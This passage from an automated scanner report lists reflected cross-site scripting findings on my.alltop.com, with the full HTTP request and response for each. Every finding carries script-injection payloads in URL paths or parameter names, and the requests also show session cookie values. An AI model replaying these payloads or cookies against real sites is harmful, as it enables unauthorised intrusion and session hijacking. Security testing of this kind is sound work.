Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:09 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>c8abe<script>alert(1)</script>1964ca13435" method="post" accept-charset="utf-8">
...[SNIP]...

1.244. http://my.alltop.com/alpha/y [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82d13"><script>alert(1)</script>c3b10be6e77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y82d13"><script>alert(1)</script>c3b10be6e77 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y82d13"><script>alert(1)</script>c3b10be6e77" method="post" accept-charset="utf-8">
...[SNIP]...

1.245. http://my.alltop.com/alpha/y [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa6f1"><script>alert(1)</script>bd961c23b69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y?aa6f1"><script>alert(1)</script>bd961c23b69=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:06 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:06 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:06 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y?aa6f1"><script>alert(1)</script>bd961c23b69=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.246. http://my.alltop.com/alpha/y [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dd4b"><script>alert(1)</script>3c401fb3751 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AA)%3C/script%3E7dd4b"><script>alert(1)</script>3c401fb3751 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:43 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:45 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:45 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AA)%3C/script%3E7dd4b"><script>alert(1)</script>3c401fb3751" method="post" accept-charset="utf-8">
...[SNIP]...

1.247. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e2af"><script>alert(1)</script>ff5fd060af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y'%22--%3E%3C9e2af"><script>alert(1)</script>ff5fd060af/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:16 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:16 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y'%22--%3E%3C9e2af"><script>alert(1)</script>ff5fd060af/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.248. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71196"><script>alert(1)</script>5b5787c45e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y'%22--%3E%3C/style%3E%3C71196"><script>alert(1)</script>5b5787c45e5/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:17 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y'%22--%3E%3C/style%3E%3C71196"><script>alert(1)</script>5b5787c45e5/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.249. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a055"><script>alert(1)</script>65d8d772fe3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C7a055"><script>alert(1)</script>65d8d772fe3/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:18 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:18 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:18 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C7a055"><script>alert(1)</script>65d8d772fe3/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.250. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 275a4"><script>alert(1)</script>83baa9f1260 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E275a4"><script>alert(1)</script>83baa9f1260 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:19 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:19 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:19 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E275a4"><script>alert(1)</script>83baa9f1260" method="post" accept-charset="utf-8">
...[SNIP]...

1.251. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7343d"><script>alert(1)</script>9e1094090ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E?7343d"><script>alert(1)</script>9e1094090ef=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:14 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E?7343d"><script>alert(1)</script>9e1094090ef=1" method="post" accept-charset="utf-8">
...[SNIP]...

